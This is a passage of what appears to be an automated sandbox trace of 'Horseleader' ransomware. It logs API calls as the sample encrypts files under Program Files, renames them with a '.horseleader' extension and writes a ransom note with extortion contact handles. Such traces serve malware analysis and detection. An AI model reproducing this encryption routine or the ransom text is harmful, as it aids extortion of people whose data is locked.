Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 68 [0228.309] StrStrIW (lpFirst="PNG32.FLT", lpSrch=".horseleader") returned 0x0 [0228.309] lstrcmpW (lpString1="PNG32.FLT", lpString2="#Decrypt#.txt") returned 1 [0228.309] lstrcmpW (lpString1="PNG32.FLT", lpString2="_uninstalling_.png") returned 1 [0228.309] lstrlenW (lpString=".testttjffg") returned 11 [0228.309] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT", lpSrch=".testttjffg") returned 0x0 [0228.309] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.309] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.309] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.310] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 68 [0228.310] StrStrW (lpFirst="PNG32.FLT", lpSrch=".txt") returned 0x0 [0228.310] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=302976) returned 1 [0228.310] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.310] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.337] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.337] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.338] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x227c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.338] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.344] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.344] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) 
returned 1 [0228.344] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x44f80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.344] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.349] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.349] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.350] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.350] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.350] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.355] CloseHandle (hObject=0x158) returned 1 [0228.355] GetProcessHeap () returned 0x780000 [0228.355] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.355] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.horseleader") returned 80 [0228.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT" (normalized: "c:\\program files\\common files\\microsoft 
shared\\grphflt\\png32.flt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\png32.flt.horseleader")) returned 1 [0228.357] GetProcessHeap () returned 0x780000 [0228.357] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.357] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd53d4900, ftCreationTime.dwHighDateTime=0x1cb7002, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd53d4900, ftLastWriteTime.dwHighDateTime=0x1cb7002, nFileSizeHigh=0x0, nFileSizeLow=0x44780, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WPGIMP32.FLT", cAlternateFileName="")) returned 1 [0228.357] lstrcmpiW (lpString1="WPGIMP32.FLT", lpString2="Windows") returned 1 [0228.357] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 71 [0228.357] StrStrIW (lpFirst="WPGIMP32.FLT", lpSrch=".horseleader") returned 0x0 [0228.357] lstrcmpW (lpString1="WPGIMP32.FLT", lpString2="#Decrypt#.txt") returned 1 [0228.357] lstrcmpW (lpString1="WPGIMP32.FLT", lpString2="_uninstalling_.png") returned 1 [0228.357] lstrlenW (lpString=".testttjffg") returned 11 [0228.357] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT", lpSrch=".testttjffg") returned 0x0 [0228.357] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.357] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.357] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.360] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 71 [0228.360] StrStrW (lpFirst="WPGIMP32.FLT", lpSrch=".txt") returned 0x0 [0228.360] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=280448) returned 1 [0228.360] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.360] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.363] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.363] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.374] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1fbc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.374] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.376] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.376] 
WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.376] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3f780, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.377] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.441] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.441] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.441] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.442] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.442] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.442] CloseHandle (hObject=0x158) returned 1 [0228.442] GetProcessHeap () returned 0x780000 [0228.442] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.442] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\GRPHFLT\\WPGIMP32.FLT.horseleader") returned 83 [0228.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt.horseleader")) returned 1 [0228.443] GetProcessHeap () returned 0x780000 [0228.444] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.444] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd53d4900, ftCreationTime.dwHighDateTime=0x1cb7002, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd53d4900, ftLastWriteTime.dwHighDateTime=0x1cb7002, nFileSizeHigh=0x0, nFileSizeLow=0x44780, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WPGIMP32.FLT", cAlternateFileName="")) returned 0 [0228.444] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0228.444] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\#Decrypt#.txt") returned 72 [0228.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0228.445] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation 
instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0228.445] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0228.446] lstrlenA (lpString="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") returned 1368 [0228.446] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0228.447] CloseHandle (hObject=0x21c) returned 1 [0228.447] GetProcessHeap () returned 0x780000 [0228.447] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0228.447] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Help", cAlternateFileName="")) returned 1 [0228.447] lstrcmpiW (lpString1="Help", lpString2="Windows") returned -1 [0228.447] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help") returned 55 [0228.447] lstrcmpW (lpString1="Help", lpString2=".") returned 1 [0228.447] lstrcmpW (lpString1="Help", lpString2="..") returned 1 [0228.448] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0228.448] GetProcessHeap () returned 0x780000 [0228.448] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) 
returned 0x7d9fd8 [0228.448] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*") returned 57 [0228.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0228.449] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0228.449] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\.") returned 57 [0228.449] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0228.449] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0228.449] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0228.449] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\..") returned 58 [0228.449] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0228.449] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0228.449] FindNextFileW (in: 
hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x60d54030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x133200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hxds.dll", cAlternateFileName="")) returned 1 [0228.449] lstrcmpiW (lpString1="hxds.dll", lpString2="Windows") returned -1 [0228.450] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 64 [0228.450] StrStrIW (lpFirst="hxds.dll", lpSrch=".horseleader") returned 0x0 [0228.450] lstrcmpW (lpString1="hxds.dll", lpString2="#Decrypt#.txt") returned 1 [0228.450] lstrcmpW (lpString1="hxds.dll", lpString2="_uninstalling_.png") returned 1 [0228.450] lstrlenW (lpString=".testttjffg") returned 11 [0228.450] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll", lpSrch=".testttjffg") returned 0x0 [0228.450] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0228.450] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0228.450] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0228.452] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 64 [0228.452] 
StrStrW (lpFirst="hxds.dll", lpSrch=".txt") returned 0x0 [0228.452] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1257984) returned 1 [0228.452] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.452] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.455] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.455] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.456] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x97100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.456] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.459] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.459] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.459] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x12e200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.459] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.464] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0228.464] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0228.464] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0228.464] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0228.465] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0228.465] CloseHandle (hObject=0x158) returned 1 [0228.465] GetProcessHeap () returned 0x780000 [0228.465] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0228.465] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.horseleader") returned 76 [0228.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll.horseleader")) returned 1 [0228.466] GetProcessHeap () returned 0x780000 
[0228.466] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0228.466] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3e47200, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x522dc930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe3e47200, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x1bf200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ITIRCL55.DLL", cAlternateFileName="")) returned 1 [0228.467] lstrcmpiW (lpString1="ITIRCL55.DLL", lpString2="Windows") returned -1 [0228.467] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 68 [0228.467] StrStrIW (lpFirst="ITIRCL55.DLL", lpSrch=".horseleader") returned 0x0 [0228.467] lstrcmpW (lpString1="ITIRCL55.DLL", lpString2="#Decrypt#.txt") returned 1 [0228.467] lstrcmpW (lpString1="ITIRCL55.DLL", lpString2="_uninstalling_.png") returned 1 [0228.467] 